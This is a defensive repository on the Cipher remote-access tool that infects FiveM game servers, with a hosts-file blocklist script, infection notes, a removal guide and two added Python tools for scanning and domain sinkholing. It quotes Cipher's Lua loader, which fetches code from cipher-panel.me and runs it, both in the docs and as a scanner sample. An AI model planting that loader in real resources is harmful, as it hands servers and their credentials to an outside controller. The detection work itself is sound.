├── CipherNetworkBlock.bat
├── Documentation
│   ├── How-It-Works.md
│   └── Infection.md
└── README.md

/CipherNetworkBlock.bat:
--------------------------------------------------------------------------------
```bat
@echo off
rem Abort unless running elevated: "net session" fails without Administrator rights.
net.exe session 1>NUL 2>NUL || (start cmd /c "@echo off & title EndProjectCipher & mode con cols=36 lines=2 & color 0C & echo You must run this as Administrator & pause>nul" & EXIT)
echo.
rem Start the hosts file on a fresh line, then append one loopback entry per Cipher domain.
rem Note: entries are appended unconditionally, so re-running this script adds duplicate lines.
echo. >> %WINDIR%\System32\drivers\etc\hosts
echo [ProjectEndCipher] Blocking cipher-panel.me...
echo 127.0.0.1 cipher-panel.me >> %WINDIR%\System32\drivers\etc\hosts
echo [ProjectEndCipher] Blocked cipher-panel.me
echo.
echo [ProjectEndCipher] Blocking ciphercheats.com...
echo 127.0.0.1 ciphercheats.com >> %WINDIR%\System32\drivers\etc\hosts
echo [ProjectEndCipher] Blocked ciphercheats.com
echo.
echo [ProjectEndCipher] Blocking keyx.club...
echo 127.0.0.1 keyx.club >> %WINDIR%\System32\drivers\etc\hosts
echo [ProjectEndCipher] Blocked keyx.club
echo.
echo [ProjectEndCipher] Blocking dark-utilities.xyz...
echo 127.0.0.1 dark-utilities.xyz >> %WINDIR%\System32\drivers\etc\hosts
echo [ProjectEndCipher] Blocked dark-utilities.xyz
echo.
pause
```
--------------------------------------------------------------------------------

/Documentation/How-It-Works.md:
--------------------------------------------------------------------------------
# How Cipher Works
**Cipher** works by releasing infected code/resources to the FiveM public. Server owners/developers take the code (not knowing it is infected) and install it on their servers. Once the resource is installed and run, it injects its code into other previously clean resources.

**The initial infected code boils down to the following:**

```Lua
PerformHttpRequest('https://cipher-panel.me/_i/i?to=UNIQUECODE', function (e, d)
    local s = assert(load(d))
    if (d == nil) then return end
    s()
end)
```

The **Unique Code** in the URL request identifies the Cipher user that now has control of your server. Once this code is run it downloads the remote code (from Cipher) and runs it on line 4 as a function.

This is the basis of how most of Cipher works. It proceeds to make several more download requests (found in the code returned by Cipher) and continues until it has injected itself into more pre-existing resources.

Read **Infection Documentation** for more information on what it expands into.
--------------------------------------------------------------------------------

/Documentation/Infection.md:
--------------------------------------------------------------------------------
# Infection
After your server has initially been infected it will rapidly expand to other resources.

We have found, by printing each Cipher request, that it modifies two resources.

- **Old Method:** Modifies the default __rconlog__ resource to allow remote execution.
- **New Method:** Modifies the __YARN__ and __Webpack__ builders.

### New Method Information:
- `resources\[system]\[builders]\yarn\yarn_builder.js`
  - Will modify the index.js of webpack to run the ``is-glob`` node module.
- `resources\[system]\[builders]\webpack\node_modules\is-glob\index.js`
  - Modifies the ``is-glob`` node module to run remote code and infect further resources.
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
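A scanner that looks for the two things the documentation above describes: the loader shape from How-It-Works.md (a `PerformHttpRequest` whose response body is handed to `load()`) and the builder files Infection.md names as modified. This is an added example, not a script from the ProjectEndCipher repository. The indicators (the loader pattern, the four domains from CipherNetworkBlock.bat, the two builder paths) come from the repository; the `scan_text`, `scan_tree` and `demo` functions, the constructed sample Lua, and the idea of hashing the builder files so they can be compared against the same files from a clean FiveM server-data download are assumptions.

```python
"""Scan a FiveM resources directory for the Cipher loader pattern and the
indicators listed in ProjectEndCipher's documentation.

Added example for illustration; it is not a script from the ProjectEndCipher
repository. The indicators come from the documentation; the directory layout
and the "hash the builder files and compare with a clean copy" workflow are
assumptions.
"""
import hashlib
import re
import sys
from pathlib import Path

# Domains from the repository's hosts blocklist (CipherNetworkBlock.bat).
CIPHER_DOMAINS = ("cipher-panel.me", "ciphercheats.com", "keyx.club", "dark-utilities.xyz")

# Builder files that Infection.md names as modified by the "new method",
# relative to the resources/ directory.
BUILDER_FILES = (
    Path("[system]") / "[builders]" / "yarn" / "yarn_builder.js",
    Path("[system]") / "[builders]" / "webpack" / "node_modules" / "is-glob" / "index.js",
)

# The loader shape: an HTTP fetch plus a load()/loadstring() call that compiles
# whatever came back. Either alone is common in clean code; together they are
# the remote-code loader quoted in How-It-Works.md.
HTTP_RE = re.compile(r"PerformHttpRequest")
LOAD_RE = re.compile(r"\b(?:load|loadstring)\s*\(")


def scan_text(rel_path, text):
    """Return human-readable findings for one file's contents."""
    findings = []
    lowered = text.lower()
    for domain in CIPHER_DOMAINS:
        if domain in lowered:
            findings.append(f"{rel_path}: references known Cipher domain {domain}")
    if HTTP_RE.search(text) and LOAD_RE.search(text):
        findings.append(f"{rel_path}: PerformHttpRequest response passed to load() (remote code loader)")
    return findings


def scan_tree(resources_dir):
    """Scan every .lua/.js file under resources_dir.

    Returns (findings, builder_hashes); builder_hashes maps each builder file
    named in Infection.md to its SHA-256 so it can be compared with the same
    file from a clean FiveM server-data download (assumed workflow).
    """
    root = Path(resources_dir)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in (".lua", ".js"):
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError as exc:
            findings.append(f"{path}: unreadable ({exc})")
            continue
        findings.extend(scan_text(str(path.relative_to(root)), text))
    builder_hashes = {}
    for rel in BUILDER_FILES:
        full = root / rel
        if full.is_file():
            builder_hashes[str(rel)] = hashlib.sha256(full.read_bytes()).hexdigest()
    return findings, builder_hashes


# Constructed sample mirroring the loader quoted in How-It-Works.md, with the
# unique code replaced by a placeholder, so the script demonstrates something
# without a real server. The clean sample is also constructed.
SAMPLE_INFECTED_LUA = """
PerformHttpRequest('https://cipher-panel.me/_i/i?to=PLACEHOLDER', function (e, d)
    local s = assert(load(d))
    if (d == nil) then return end
    s()
end)
"""
SAMPLE_CLEAN_LUA = "RegisterCommand('hello', function() print('hi') end)\n"


def demo():
    """Run the content scan on the constructed samples; returns the findings."""
    return (scan_text("leaked_resource/server.lua", SAMPLE_INFECTED_LUA)
            + scan_text("clean_resource/server.lua", SAMPLE_CLEAN_LUA))


if __name__ == "__main__":
    if len(sys.argv) > 1:
        found, hashes = scan_tree(sys.argv[1])
        for line in found:
            print(line)
        for name, digest in hashes.items():
            print(f"builder file {name}: sha256 {digest}")
    else:
        for line in demo():
            print(line)
```

Run it as `python scan_cipher.py /path/to/server-data/resources`; with no argument it scans the constructed samples. The content heuristic deliberately requires both halves of the loader (the HTTP fetch and the `load()` call) in the same file, because each half alone appears in plenty of legitimate resources; an obfuscated loader that hides the function names will not match, which is why the builder-file hashes are reported as well.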

ProjectEndCipher Discord Server

# Cipher Panel
Cipher is a paid Remote Execution/Administration Tool (RAT). Cipher's customers generate 4 lines of Lua code to inject into resources (many of them obfuscate the code) which will download remote code from the Cipher servers. We've found many leaked resources are infected with Cipher-Panel. This repository explains how Cipher works.

# How Cipher Works
Cipher works by releasing infected code/resources to the FiveM public. Server owners/developers take the code (not knowing it is infected) and install it on their servers. Once the resource is installed and run, it injects its code into other previously clean resources.

The initial infected code boils down to the following:

```Lua
PerformHttpRequest('https://Cipher-panel.me/_i/i?to=UNIQUECODE', function (e, d)
    local s = assert(load(d))
    if (d == nil) then return end
    s()
end)
```

The Unique Code in the URL request identifies the Cipher user that now has control of your server. Once this code is run it downloads the remote code (from Cipher) and runs it on line 4 as a function.

This is the basis of how most of Cipher works. It proceeds to make several more download requests (found in the code returned by Cipher) and continues until it has injected itself into more pre-existing resources.

After the code is run, it uploads some JavaScript and overrides existing files within the system builders directory:

`resources\[system]\[builders]`

The code then propagates itself through all of your resources and files within the FiveM server installation to make it difficult to remove.

At this stage it's armageddon: every file within the server is compromised, meaning files can be downloaded, uploaded, edited and viewed, including but not limited to the server.cfg, SQL credentials, and even your Cfx license keys.
They're also able to run remote code on the server, which leads to the last step.

Cipher is a RAT that has the capability of gaining full system administrator access to take over the host machine it's run on. It does this by using PowerShell to download a RAT executable and also add/alter users to provide remote desktop access to your server. This backdoor approach also supports Linux.

Cipher customers have been seen attempting to extort servers for money paid in cryptocurrency in exchange for deterring the Cipher user from deleting the server entirely.

Read Infection Documentation for more information on what it expands into.

# How To Remove Cipher

If you have been infected with Cipher, this is what you must do:

Disconnect your server from the internet and access it via KVM (if possible).

Blacklist their domains on your firewall. This will slow them down; we have seen instances where they use proxies to evade this, but on most leaks this will help.

Edit the hosts file `C:\Windows\System32\drivers\etc\hosts` and add:

```
127.0.0.1 cipher-panel.me
127.0.0.1 ciphercheats.com
127.0.0.1 keyx.club
127.0.0.1 dark-utilities.xyz
```

Install antivirus software on the host machine to scan for any backdoors / RATs.

Check the administrator accounts on the machine to verify that no unauthorized accounts exist.

Change any passwords you have on the host machine to ensure that they don't have access.

While your FiveM server is turned off, use the provided Python script to install a nullifier which will help prevent future infections of Cipher and tell you which files are infected.

You can also install this code manually; however, we expect Cipher will attempt to patch this.
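The hosts-file step above, done from a script that checks the file before writing. This is an added example, not the repository's CipherNetworkBlock.bat: unlike the batch file it parses the hosts file first, so running it twice never duplicates entries, and it reports a domain that is already mapped to some other address instead of appending a second line behind it (on common resolvers the first matching line wins, so a later `127.0.0.1` entry would not take effect). The four domains are the README's; the `hosts_path`, `parse_hosts`, `merge_hosts` and `apply` names and the per-OS hosts path are assumptions.

```python
"""Sinkhole the Cipher domains from ProjectEndCipher's README in the hosts file.

Added example, not the repository's CipherNetworkBlock.bat. It is idempotent
and reports conflicting existing entries. The per-OS hosts path is an
assumption.
"""
import os
import sys

CIPHER_DOMAINS = ("cipher-panel.me", "ciphercheats.com", "keyx.club", "dark-utilities.xyz")
SINKHOLE = "127.0.0.1"                       # address used by the README's block list
SINKHOLE_ADDRS = {SINKHOLE, "0.0.0.0", "::1"}  # any of these counts as already blocked


def hosts_path():
    """Assumed location of the hosts file on Windows and POSIX systems."""
    if os.name == "nt":
        windir = os.environ.get("WINDIR", r"C:\Windows")
        return os.path.join(windir, "System32", "drivers", "etc", "hosts")
    return "/etc/hosts"


def parse_hosts(text):
    """Map each hostname (lower-cased) to the list of addresses it is given."""
    mapping = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and whitespace
        parts = line.split()
        if len(parts) < 2:
            continue
        for name in parts[1:]:
            mapping.setdefault(name.lower(), []).append(parts[0])
    return mapping


def merge_hosts(text, domains=CIPHER_DOMAINS):
    """Return (new_text, added, conflicts).

    added:     domains appended as SINKHOLE entries
    conflicts: domains already mapped only to non-sinkhole addresses; these are
               reported rather than silently appended behind the existing line
    """
    mapping = parse_hosts(text)
    added, conflicts = [], []
    for domain in domains:
        addrs = mapping.get(domain.lower())
        if addrs is None:
            added.append(domain)
        elif not SINKHOLE_ADDRS.intersection(addrs):
            conflicts.append(domain)
    if not added:
        return text, added, conflicts
    body = text if text == "" or text.endswith("\n") else text + "\n"
    body += "# [ProjectEndCipher] Cipher domains sinkholed\n"
    body += "".join(f"{SINKHOLE} {domain}\n" for domain in added)
    return body, added, conflicts


def apply(path):
    """Rewrite the hosts file at path in place; returns (added, conflicts)."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        original = fh.read()
    new_text, added, conflicts = merge_hosts(original)
    if added:
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(new_text)
    return added, conflicts


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else hosts_path()
    try:
        done, bad = apply(target)
    except PermissionError:
        sys.exit(f"cannot write {target}: run as Administrator (Windows) or root (Linux)")
    for d in done:
        print(f"[ProjectEndCipher] Blocked {d}")
    for d in bad:
        print(f"[ProjectEndCipher] WARNING: {d} already resolves elsewhere in {target}; fix by hand")
    if not done and not bad:
        print("[ProjectEndCipher] All Cipher domains already blocked")
```

Run it elevated with no arguments to edit the real hosts file, or pass a path to try it on a copy first. A hosts entry only stops name resolution on this machine; the firewall blacklist from the step above is still needed, because, as the README notes, Cipher users have been seen going through proxies.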

scheduler.lua

**Make sure you do not run your FiveM server as ROOT (Linux) or Administrator (Windows)**

# Other things you can do to prevent being attacked by Cipher

Consider adding [Warden](https://discord.com/invite/jeFeDRasfs) to your Discord server. Warden is a great resource that can help remove cheaters and leakers (people who participate in sharing leaked paid resources, or who support hack products like Cipher) from your community.

Make sure to install the latest updates of whatever framework you are using:

[ESX](https://github.com/esx-framework/esx-legacy) | [ESX Discord](https://discord.esx-framework.org)

[QBCore](https://github.com/qbcore-framework/qb-core) | [QBCore Discord](https://discord.gg/qbcore)

Consider investing in a good anticheat for your server, such as [Phoenix Anticheat](https://discord.com/invite/pac) or [FiveEye](https://dsc.gg/FiveEye), or any other anti-cheat that you feel comfortable using. (We are currently working with multiple anticheat providers to patch Cipher. Progress will be shown here.)

Buy resources only from reputable places that you feel comfortable purchasing from, either Tebex-listed stores or places like [Modit](https://modit.store/). If you're unsure about a store, ask for guidance on the Warden Discord.

Be extremely suspicious of code that is encrypted or downloaded from shady sources.

Lastly, the most important thing… DON'T USE LEAKED RESOURCES!

## Cipher Customers

If you are a customer of Cipher, we suggest canceling your subscription and getting a refund.
--------------------------------------------------------------------------------